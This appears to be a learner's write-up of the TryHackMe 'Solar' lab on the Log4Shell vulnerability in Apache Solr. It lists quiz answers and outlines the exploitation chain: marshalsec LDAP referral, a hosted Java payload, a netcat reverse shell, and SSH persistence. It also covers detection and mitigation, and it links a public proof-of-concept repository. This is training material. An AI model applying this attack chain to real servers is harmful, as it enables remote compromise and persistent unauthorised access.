TryHackMe Writeup : Solar, exploiting Log4J🥷🏻🥷🏻

Hi there,

This write-up is related to the room created at TryHackMe over Solar Log4J shell vulnerability. This write-up might help you at some places.

A request. If the write-up was of help, have clap and share it to the people who might get a help needed to solve this lab. Thanks👏

So, let’s get started with the problems and their solutions.😎

Task 1 : CVE-2021–44228 Introduction

This section consists of Introduction of Log4J Vulnerability, and its significance + dependence over different platforms.

Answers : Just click the boxes of Completed (as this section is for reading)

Task 2 : Reconnaissance

This section is about what Log4J is and getting familiar with the practice lab. Get familiar with the lab at this place (https://{ip-address-of-solar-lab-panel}:8983)

After this, you will reach here :-

2.1) Scan the machine to determine what ports are accessible.

Answer :- (Mark as Completed)

2.2) What service is running on port 8983? (Just the name of the software)

TIP :- Use nmap -sV -p- (ip-address-of-the-lab)

( This might get quite tricky as many will put APACHE with its version for the answer. But the answer is quite simple. Your witty brain and quite rigorous scan will help you.)

Answer :- APACHE SOLR

Task 3 : Discovery

This section covers about Apache Solr lab. Download the file at the top right, and get your hands dirty. Scan the files, read quite a bit, or just open in the side of your window in your system, and get ready for the questions. (These are if you wish for, else this write-up covers all the answers).

3.1) Take a close look at the first page visible when navigating to http://10.10.169.103:8983. You should be able to see clear indicators that log4j is in use within the application for logging activity. What is the -Dsolr.log.dir argument set to, displayed on the front page?

TIP :- Scan the files that you downloaded. you will get to know that highest times of the files that are being found at a path is the answer.

BTW, Answer :- /var/solr/logs

3.2) One file has a significant number of INFO entries showing repeated requests to one specific URL endpoint. Which file includes contains this repeated entry? (Just the filename itself, no path needed)

TIP :- Scan the files. See what term is being repeated in the file.

BTW, Answer :- solr.log

3.3) What "path" or URL endpoint is indicated in these repeated entries?

TIP :- Scan the files and find which directory path is being referred or repeated again and again.

BTW, Answer :- /admin/cores

3.4) Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

TIP :- Scan the file that you downloaded and you will get the term with = sign.

BTW, Answer :- params

Task 4 : Proof of Concept

This section covers about Directory Traversal towards /admin/cores section of the lab. Follow the section. Nothing much challenging, but consists of a lot of Information.

4.1 )

Answer :- (Mark as Completed)

4.1)

Answer :- (Mark as Completed)

4.3)

Answer :- (Mark As Completed)

4.4) Verify you have received a connection by seeing the following message in your netcat listener:

Answer :- (Mark As Completed)

Task 5 : Exploitation

This section covers the main juicy “Exploitation” part. Get deep dive into attack chain by completing reading it, this might help in getting your bounties during bug-bounties. (Else, to complete the labs, go for (Mark as Completed) for this section)

5.1) Read and understand the attack chain above.

Answer :- (Mark As Completed)

5.2) If you are using the TryHackMe AttackBox, you do NOT need to follow the below steps — move onto the next question.

See steps to installing Java 8 locally (follow only if not using AttackBox)

Answer :- (Mark As Completed)

5.3) Next we will need to retrieve the marshalsec utility referenced previously. If you’re on the AttackBox, navigate to /root/Rooms/solar/marshalsec.

See steps to download marshalsec locally (follow only if not using AttackBox)

Answer :- (Mark As Completed)

5.4) Download and change directories into this new folder (cd marshalsec)

Answer :- (Mark As Completed)

5.5) Please note, the AttackBox for free users doesn’t have internet and won’t install the maven packages. Either subscribe to complete this lab through the AttackBox, or install the marshlsec tool locally.

Answer :- (Mark As Completed)

5.6) What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Answer :- Listening on 0.0.0.0:1389

5.7) Run the above in the same folder as where you saved the Exploit.java file

Answer :- (Mark As Completed)

5.8) With your payload created and compiled, you can now host it by spinning up a temporary HTTP server.

Answer :- (Mark As Completed)

5.9) Your payload is created and compiled, it is hosted with an HTTP server in one terminal, your LDAP referral server is up and waiting in another terminal -- next prepare a netcat listener to catch your reverse shell in yet another new terminal window:

Answer :- (Mark As Completed)

5.10) Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax! Note the changes in port number (now referring to our LDAP server) and the resource we retrieve, specifying our exploit:

Answer :- (Mark As Completed)

5.11) Please hug any incident responders that you know.

Answer :- (Mark As Completed)

5.12) After receiving a reverse shell, feel free to experiment with other commands you could run with your Exploit.java payload. As an exercise for the reader -- can you get a Meterpreter shell loaded? How about an Empire agent? A Cobalt Strike beacon?

Answer :- (Mark As Completed)

Task 6 : Persistence

This module too has to be done with reading and exploiting stuff. If you wish to make your hands dirty and go forward, then do follow the previous section religioiusly (with all faith)😁😁

6.1) What user are you?

Answer :- solr

6.2) You now have a stable shell, where you can safely use the left-and-right arrow keys to move around your input, up-and-down arrow keys to revisit command history, Tab for autocomplete and safely Ctrl+C to stop running programs!

Answer :- (Mark As Completed)

6.3) Check super user permissions. For your convenience in this exercise, your user should have sudo privileges without the need for any password.

Answer :- (Mark As Completed)

6.4) If you would like to grant yourself persistence and access into the machine via SSH, momentarily become root and change the password for the solr user to one of your choosing. This way, you can SSH in as needed!

Answer :- (Mark As Completed)

6.5) In another terminal window, SSH into the machine with your new credentials.

Answer :- (Mark As Completed)

Task 7 : Detection

This section has only one thing to go for : Is it easy to find this vulnerability. The answer is simple, Quite severely Hard (For newbies)

7.1) To explore our own logs, use your SSH connection or reverse shell to move into the directory where the Solr logs are stored. (You already know what this path is — you gave it as an answer in Task #3)

Answer :- (Mark As Completed)

7.2) Review the log file that you know is affected by the log4j vulnerability.

Answer :- (Mark As Completed)

7.3) Notice your JNDI attack syntax included in the log entries! If you would like to experiment more, try some of the bypasses mentioned in the Task below.

Answer :- (Mark As Completed)

Task 8 : Bypasses

This is a reading section. Do read it for more information about Log4J Vulnerability.

8.1) Read the above and remind yourself you are a security professional with a strong moral compass.

Answer :- (Mark As Completed)

Task 9 : Mitigation

This section, again a reading section. But consists of a lot of wisdom.

TIP :- This section can be used in ones “Steps to Mitigation” area when submitting Bug-Bounty Reports.

9.1) What is the full path of the specific solr.in.sh file?

Answer :- /etc/default/solr.in.sh

9.2) Scroll to the bottom of the file, and add a new line with the above syntax. Save and close the file.

Answer :- (Mark As Completed)

9.3) Run the above command wait for the Apache Solr service to successfully restart.

Answer :- (Mark As Completed)

9.4) If you need a refresher on the command syntax, please scroll up to Task #5.

Answer :- (Mark As Completed)

9.5) Re-exploit the server with the same curl command syntax you used in Task #5.

Answer :- (Mark As Completed)

9.6) Verify that this Apache Solr instance has now been mitigated against the Log4shell exploit!

Answer :- (Mark As Completed)

Task 10 : Patching

This section, again, a reading section. Do a read if one wishes too. Hope this helps.

10.1) “I understand the implications of this and will patch early, often, and always.”

Answer :- (Mark As Completed)

Task 11 : Credits and Author’s Notes

This section is a “Thank You” note for all the people who are connected with this lab. Let’s face it, we should appreciate the people who were connected and created this lab so that we were able to learn about Log4J Vulnerability

Go do great things!

Answer :- (Mark As Completed)

Overall My Opinion / Response to this Lab :

This lab is all about to learn more, and experiment quite less, and a overall learning experience over Solr Log4J Shell Vulnerability.

Also, check out these places to learn more about Log4J shell Vulnerability For FREE….!!!!!!

Lab :- https://github.com/Cyb3rWard0g/log4jshell-lab

POC :- https://github.com/kozmer/log4j-shell-poc

So, here I end this lab write-up. This might help quite little only, but a help is a help 😋😋. Till the time

===========Happy Hacking===========